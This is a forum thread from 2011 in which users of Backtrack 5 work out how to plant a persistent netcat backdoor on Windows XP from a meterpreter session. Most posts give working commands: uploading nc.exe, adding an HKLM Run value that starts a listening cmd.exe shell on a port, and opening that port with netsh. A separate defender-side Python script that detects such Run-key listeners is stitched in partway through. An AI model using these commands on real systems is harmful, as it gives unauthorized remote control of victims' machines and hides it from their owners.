Backtrack 5- netcat/backdoor

  #1  
Old 21-06-2011
Edi
Member
 
Join Date: May 2011
Posts: 128

Hello everyone, I'm trying the guides on uploading a netcat backdoor with the Backtrack 5 KDE version. I have successfully tested this in Backtrack 3 and Backtrack 4, and at that time it worked. Now I have trouble in Backtrack 5. My laboratory is a Backtrack 5 host, Windows XP SP3 and a virtual Vista. When I obtain a meterpreter shell and run the commands, everything looks flawless, but when I try to call the netcat connection, my connection is refused. My commands are as follows:
Code:
*meterpreter> upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
*meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run OK!
*meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v CIAUZ -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!
Successful set CIAUZ.
*meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run OK!

  #2  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 991
Re: Backtrack 5- netcat/backdoor

Reply 1
Next, we need to modify the system to permit remote connections through the firewall to our netcat backdoor. For this:
Code:
meterpreter > execute -f cmd -i

Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents > netsh firewall show opmode
Netsh firewall show opmode

C:\Documents and Settings\Victim\My Documents > netsh firewall add portopening TCP 1111 "Service Firewall" ENABLE ALL

C:\Documents and Settings\Victim\My Documents > netsh firewall show portopening
  #3  
Old 21-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,035
Re: Backtrack 5- netcat/backdoor

So whenever you run netstat on the system you are "attacking", you will see netcat listening on this port 1111. Netcat doesn't always use this port; in netcat you have an option to provide the port number where you want your backdoor to run. Whenever you run netcat, your backdoor must be there in his system taskbar. It must exist within C:\\WINDOWS\\SYSTEM32\\, wherever you upload it. If you check Event Viewer on the victim system, you can check the backdoor there.
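A defender-side check for the artifacts this thread describes, as an added example that is not code from any poster: it parses `reg query` output for the Run key, flags values whose command line asks for a listening shell (`-l`/`-L` together with `-e`), and checks `netstat -ano` output for the port. The sample output is constructed from values quoted across the thread, including the one with its backslashes stripped; all function names are hypothetical.

```python
import re

# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`.
# The CIAUZ and BACKDOOR data mirror the thread; the first value is benign filler.
REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    CIAUZ    REG_SZ    C:WINDOWSsystem32nc.exe -L -d -p 1111 -e cmd.exe
    BACKDOOR    REG_SZ    C:\Windows\System32\nc.exe -ldp 4144 -e cmd.exe
"""

# Constructed sample of `netstat -ano` output.
NETSTAT = """
  TCP    0.0.0.0:135     0.0.0.0:0    LISTENING    964
  TCP    0.0.0.0:1111    0.0.0.0:0    LISTENING    1604
"""

VALUE_RE = re.compile(r"^\s+(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.+)$")
LISTEN_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING", re.M)

def parse_run_values(text):
    """Return {value_name: command_line} from `reg query` text output."""
    matches = (VALUE_RE.match(line) for line in text.splitlines())
    return {m.group(1): m.group(2).strip() for m in matches if m}

def listener_port(cmdline):
    """Port if the command line requests a listening shell (-l/-L plus -e), else None.
    Matches on flags, not on the path, so a value with stripped backslashes
    or a renamed binary is still flagged."""
    tokens = cmdline.split()
    flags, port = set(), None
    for i, tok in enumerate(tokens[1:], start=1):
        if re.fullmatch(r"-[A-Za-z]+", tok):          # handles "-L -d -p" and "-ldp"
            flags.update(tok[1:].lower())
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            if tok.lower().endswith("p") and nxt.isdigit():
                port = int(nxt)
    return port if {"l", "e"} <= flags else None

def audit(reg_text, netstat_text):
    """Return [(value_name, port, currently_listening)] for suspicious Run values."""
    live = {int(p) for p in LISTEN_RE.findall(netstat_text)}
    return [(name, port, port in live)
            for name, cmd in parse_run_values(reg_text).items()
            if (port := listener_port(cmd)) is not None]
```

A flagged value whose port is not listening, like the constructed `BACKDOOR` entry here, is still persistence waiting for the next logon and should be treated as a finding.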
  #4  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 859
Re: Backtrack 5- netcat/backdoor

I'm happy: bt5 > xp sp3 virtual
Code:
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!!!
On the victim (XP), look in regedit:
CIAUZ REG_SZ C:WINDOWSsystem32nc.exe -L -d -p 1111 here is the error!
I corrected it by hand:
CIAUZ REG_SZ C:\WINDOWS\system32\nc.exe -L -d -p 1111 IT WORKS NOW
  #5  
Old 21-06-2011
Member
 
Join Date: Apr 2009
Posts: 967
Re: Backtrack 5- netcat/backdoor

All my firewalls and antivirus are disabled (router, host, virtual)! From my limited experience,
I think the problem might be caused by Metasploit (meterpreter), because of the command
Code:
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"
But on the victim PC nc.exe does not start automatically, because of a mistake with the backslashes \ \ \. Result: on the victim (XP), look in regedit:
Ciauz REG_SZ C: WINDOWSsystem32nc.exe-L-d-p 1111 the error is here!
  #6  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 2,676
Re: Backtrack 5- netcat/backdoor

I have been testing this as well, using Backtrack 5 - 32bit - Gnome, and the victim machine is XP SP3 (not virtual).
I'm experiencing a similar thing to you: the \ is absent from the registry value

Code:
"c:\windows\system32\nc.exe......."
I have noticed though, that if you set the registry key like this;

Code:
reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\system32\\nc.exe
You will see the registry value is correct, c:\windows\system32\nc.exe
But as soon as you use the " " to accommodate the spaces, you lose the \ slashes. I will keep playing with netcat.
  #7  
Old 21-06-2011
Member
 
Join Date: Apr 2010
Posts: 173
Re: Backtrack 5- netcat/backdoor

This is how I managed to get it to work on my setup;

Code:
reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v BACKDOOR -d C:\\Windows\\System32\\nc.exe" -ldp 4144 -e cmd.exe"
I just moved the position of the " ". Maybe this will work for you also.
  #8  
Old 21-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,292
Re: Backtrack 5- netcat/backdoor

I will surely try these commands on my home PC once I reach home; right now I'm out. Tonight I think all your commands will work (maybe in my various tests I have already used similar commands!). The fact remains that after years of running the same commands by heart, you must now change! With my lack of experience, it seems to be a difficulty with the meterpreter shell. The above information was surely helpful.